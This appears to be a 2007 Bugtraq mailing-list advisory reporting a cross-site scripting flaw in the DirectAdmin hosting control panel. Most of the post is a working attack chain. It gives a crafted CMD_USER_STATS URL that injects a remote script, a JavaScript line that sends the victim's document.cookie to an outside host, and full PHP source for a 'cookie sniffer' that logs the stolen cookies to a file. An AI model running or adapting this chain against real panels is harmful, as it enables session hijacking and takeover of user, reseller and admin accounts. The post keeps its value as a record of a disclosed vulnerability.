
Date: 15 Mar 2007 23:48:10 -0000
From: Mandr4ke.root@...il.com
To: bugtraq@...urityfocus.com
Subject: DirectAdmin Cross Site Scripting XSS

-=[Fusi0n Group]=-

# Script name .....: DirectAdmin
# Script site .....: http://directadmin.com
# Release Date ....: 15/03/2007
# Version .........: All
# Find by .........: Mandr4ke
# Contact .........: Mandr4ke.root[at]gmail.com
# Greetings .......: Fusi0nGroup & DevilTeam & Nof

-----------------------------------------------------------
Exploit: DirectAdmin Cross Site Scripting XSS
-----------------------------------------------------------

#
# All DirectAdmin level: User,Reseller,Admin.
#
# Exploit:
#
# http://localhost:2222/CMD_USER_STATS?RESULT=%3Cscript%20src='http://server.com/script.js'%3E&domain=
#


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.php = CHMOD 777 

Source:

<?php
  $filename = "cookies.txt";
  if (isset($_GET["cookie"]))
  {
    if (!$handle = fopen($filename, 'a'))
    {
      echo ".";
      exit;
    }
    else
    {
      if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
      {
        echo ".";
        exit;
      }
    }
    echo ".";
    fclose($handle);
    exit;
  }
  echo ".";
  exit;

//Cookie Sniffer by Kacper - DevilTeam

?>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.js

Source:

location.href='http://server.com/script.php?cookie='+escape(document.cookie)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/cookies.txt = CHMOD 777

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#
# PS ..............: Attacker must be authenticated
# Contact .........: Mandr4ke.root[at]gmail.com
#
